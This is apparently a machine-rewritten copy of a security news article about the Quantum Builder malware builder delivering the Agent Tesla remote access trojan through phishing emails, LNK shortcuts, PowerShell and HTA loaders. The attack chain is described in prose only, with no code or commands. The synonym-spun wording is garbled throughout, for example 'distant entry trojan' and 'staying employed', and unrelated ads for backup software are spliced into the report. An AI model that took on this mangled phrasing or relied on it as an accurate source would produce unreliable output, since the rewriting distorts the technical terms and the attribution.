A not too long ago discovered malware builder known as Quantum Builder is staying employed to produce the Agent Tesla distant entry trojan (RAT).
“This marketing campaign characteristics enhancements and a shift toward LNK (Windows shortcut) information when as opposed to equivalent attacks in the previous,” Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar claimed in a Tuesday generate-up.
Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.
Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).
➤ Activate Your Coupon Code
Marketed on the dark web for €189 a thirty day period, Quantum Builder is a customizable device for making malicious shortcut data files as effectively as HTA, ISO, and PowerShell payloads to supply following-phase malware on the specific equipment, in this scenario Agent Tesla.
The multi-stage attack chain commences with a spear-phishing made up of a GZIP archive attachment that consists of a shortcut designed to execute PowerShell code liable for launching a remote HTML application (HTA) utilizing MSHTA.
The phishing email messages purport to be an get confirmation message from a Chinese supplier of lump and rock sugar, with the LNK file masquerading as a PDF doc.
The HTA file, in transform, decrypts and executes a further PowerShell loader script, which acts as a downloader for fetching the Agent Tesla malware and executing it with administrative privileges.
In a 2nd variant of the an infection sequence, the GZIP archive is replaced by a ZIP file, although also adopting further obfuscation techniques to camouflage the destructive exercise.
Quantum Builder has witnessed a surge in use in new months, with risk actors using it to distribute a variety of malware, these types of as RedLine Stealer, IcedID, GuLoader, RemcosRAT, and AsyncRAT.
“Threat actors are consistently evolving their techniques and producing use of malware builders marketed on the cybercrime marketplace,” the researchers said.
“This Agent Tesla marketing campaign is the latest in a string of attacks in which Quantum Builder has been utilized to produce malicious payloads in strategies from numerous corporations.”
Uncovered this short article exciting? Adhere to THN on Fb, Twitter and LinkedIn to go through additional exceptional material we write-up.
Some areas of this write-up are sourced from:
thehackernews.com
Improve your security posture with Wazuh, a free and open source XDR